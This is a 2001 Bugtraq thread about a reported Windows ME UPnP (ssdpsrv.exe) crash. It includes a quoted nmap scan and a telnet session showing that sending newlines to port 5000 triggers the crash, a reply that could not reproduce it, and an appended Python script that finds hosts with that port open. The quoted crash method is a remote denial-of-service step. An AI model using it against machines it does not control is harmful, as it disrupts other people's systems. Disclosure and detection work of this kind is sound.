[22931] in bugtraq
Re: Ssdpsrv.exe in WindowsME
daemon@ATHENA.MIT.EDU (reso@securitywriters.org)
Sat Oct 20 11:13:35 2001
Envelope-To: <bugtraq@securityfocus.com>
Message-ID: <001801c1594e$4a138940$e1837ed4@mesh>
From: "~" <reso@securitywriters.org>
To: <bugtraq@securityfocus.com>
Date: Sat, 20 Oct 2001 11:02:10 +0100
One of my PCs runs Windows ME so I tried to replicate the crash but to no
avail.

I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but
Ssdpsrv.exe does not crash.

I know Microsoft aren't always that great at security but making a program
that crashes after 3 new line commands seems a little silly even for them
:-)

The ME install was a custom install and the service was running so I think
there's a definite link there.

Rob Mears
http://www.securitywriters.org

----- Original Message -----
From: "milo omega" <mtwoar@hotmail.com>
To: <bugtraq@securityfocus.com>
Sent: Thursday, October 18, 2001 1:46 AM
Subject: Ssdpsrv.exe in WindowsME
> By connecting to a computer running Ssdpsrv you are able to crash the
> Ssdpsrv server.
>
> Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
> This service comes standard with the WindowsME installation.
>
> The Ssdpsrv.exe server is started at boot.
> Here is the registry entry:
> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
> Here is the file that starts the server:
> c:\windows\system\ssdpsrv.exe
>
> For information about UPnP go here:
> http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
>
> Upon running a scan on a computer running the server I get the following:
> <snip>
> bash-2.05$ nmap -sT 165.121.234.217
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port State Service
> 139/tcp open netbios-ssn
> 5000/tcp open fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
> </snap>
>
> Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
> <snip>
> bash-2.05$ telnet 165.121.234.217 5000
> Trying 165.121.234.217...
> Connected to 165.121.234.217.
> Escape character is '^]'.
>
>
>
> HTTP/1.1 400 Bad Request
>
> Connection closed by foreign host.
> bash-2.05$
> </snap>
>
> Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>
> This causes the server crash and closes port 5000.
> Either you must restart the server by manually running ssdpsrv.exe
> or reboot.
>
> shouts to pulltheplug #c.
> :o
>
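
For administrators who want to find which of their own machines expose the listener discussed in this thread, the following added example (not part of either post) reads saved nmap text output and lists the hosts that show 5000/tcp open. The function name, the sample hosts and the 192.0.2.x addresses are constructed for illustration; an open port 5000 only shows that something is listening, so confirm on the host by checking for the ssdpsrv.exe RunServices entry quoted above.

```python
import re

# Host header lines: the 2.54BETA style quoted in the post, and the
# "Nmap scan report for" style printed by later nmap releases.
HOST_RE = re.compile(
    r"^(?:Interesting ports on|Nmap scan report for)\s+(\S+?)(?:\s+\(([\d.]+)\))?:?\s*$"
)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
SSDPSRV_PORT = ("5000", "tcp")  # port the post reports ssdpsrv.exe listening on

# Constructed sample scan output (documentation addresses, not real hosts).
SAMPLE = """\
Interesting ports on host-a.example.test (192.0.2.10):
(The 1547 ports scanned but not shown below are in state: closed)
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   open        fics

Interesting ports on host-b.example.test (192.0.2.11):
Port       State       Service
139/tcp    open        netbios-ssn
5000/tcp   filtered    fics

Nmap scan report for 192.0.2.12
PORT     STATE SERVICE
5000/tcp open  upnp
"""


def hosts_exposing_ssdpsrv(nmap_text):
    """Return [(name, ip)] for hosts whose scan shows 5000/tcp open."""
    found, current = [], None
    for raw in nmap_text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            name = m.group(1).strip("()")      # header may carry only "(ip)"
            current = (name, m.group(2) or name)
            continue
        m = PORT_RE.match(line)
        if m and current:
            port, proto, state, _service = m.groups()
            if (port, proto) == SSDPSRV_PORT and state == "open" and current not in found:
                found.append(current)
    return found


if __name__ == "__main__":
    for name, ip in hosts_exposing_ssdpsrv(SAMPLE):
        print(f"{ip}\t{name}\t5000/tcp open: check for ssdpsrv.exe in RunServices")
```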